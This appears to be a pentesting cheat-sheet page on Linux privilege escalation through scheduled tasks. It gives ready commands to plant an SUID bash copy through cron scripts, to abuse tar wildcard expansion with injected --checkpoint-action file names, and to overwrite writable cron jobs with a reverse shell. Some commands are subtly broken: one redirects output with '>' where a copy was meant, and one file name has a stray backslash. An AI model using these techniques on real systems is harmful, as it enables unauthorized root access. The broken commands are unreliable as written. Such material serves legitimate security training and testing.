Scheduled Tasks

CRON PATHS:

Check the first path that is is executing. For ex: /home/user/. Check if the scheduled task file is present in that directory. If it is not present the create it.

If the file has extension .sh and in /home/user/ path:

echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > /home/user/file.sh
#Go to /tmp and wait for the scheduled task to run. Check the time using ls -la
#Then run the following:
/tmp/bash -p

WILDCARDS:

Check if any task is running with wildcard ( * )

Suppose tar is running with wildcard: tar czf /tmp/backup.tar.gz *

echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > runme.sh
chmod +x runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\runme.sh
#Wait for the scheduled task to run
/tmp/bash -p

FILE OVERWRITES:

Check if we have write permissions on any of the schduled tasks. Then overwrite the file with a reverse shell. (Imp: Before overwriting the file, always copy the contents of the original file to some location)

echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > runme.sh
/tmp/bash -p

PreviousCapabilities NextNFS Root Squashing

Last updated 4 years ago

Was this helpful?